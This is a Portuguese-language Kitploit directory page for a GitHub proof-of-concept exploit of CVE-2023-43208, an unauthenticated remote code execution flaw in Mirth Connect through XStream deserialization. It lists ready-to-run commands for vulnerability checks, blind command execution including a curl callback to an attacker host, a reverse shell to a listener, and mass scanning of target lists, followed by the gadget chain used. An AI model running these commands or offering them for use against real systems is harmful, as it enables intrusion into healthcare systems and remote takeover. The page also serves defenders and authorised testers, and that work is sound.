Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-43208 — CVE-2023-43208: PoC de RCE pré-autenticação no Mirth Connect | Kitploit
Ferramentas/GitHubGitHub/kyakei/cve-2023-43208
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubkyakei/cve-2023-43208

CVE-2023-43208

CVE-2023-43208: PoC de RCE pré-autenticação no Mirth Connect

Ver Repositório
311há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-43208 — Mirth Connect RCE Pré-Autenticação

Execução Remota de Código Pré-Autenticada no NextGen Healthcare Mirth Connect < 4.4.1 via bypass de desserialização XStream.

CVSS 9.8 (Crítico) — Bypass do patch de CVE-2023-37679

Visão Geral

Mirth Connect usa a biblioteca Java XStream para desserializar payloads XML no endpoint /api/users sem autenticação. A correção original (CVE-2023-37679) introduziu uma lista de bloqueio de classes perigosas, mas isso foi contornado usando EventBindingInvocationHandler do Apache Commons Lang3 combinado com a cadeia InvokerTransformer do Commons Collections4.

Corrigido no Mirth Connect 4.4.1 ao mudar de lista de bloqueio para lista de permissões.

Requisitos

root@kitploit:~
pip install requests

Python 3.10+ (usa instruções match).

Uso

Verificar se um alvo é vulnerável

root@kitploit:~
python3 exploit.py check -t https://target:8443

Executar um comando (RCE cego — sem saída)

root@kitploit:~
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"

Obter um reverse shell

root@kitploit:~
# Terminal 1 (ou deixe o script gerenciar o listener):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

# Para uma melhor experiência de shell, use rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

Escanear múltiplos alvos

root@kitploit:~
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30

Cadeia de Ataque

root@kitploit:~
POST /api/users  (no auth)
     │
     ▼
XStream deserializes XML payload
     │
     ▼
sorted-set triggers Comparable.compareTo()
     │
     ▼
dynamic-proxy → EventBindingInvocationHandler (bypasses denylist)
     │
     ▼
ChainedTransformer.transform()
     │
     ▼
ConstantTransformer(Runtime.class)
  → InvokerTransformer("getRuntime")
    → InvokerTransformer("invoke")
      → InvokerTransformer("exec", <command>)
           │
           ▼
      OS command execution as Mirth Connect service user

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha a devida autorização antes de testar.

Referências

  • NVD — CVE-2023-43208
  • Horizon3.ai — Writeup
  • Catálogo CISA KEV
Baixar ferramenta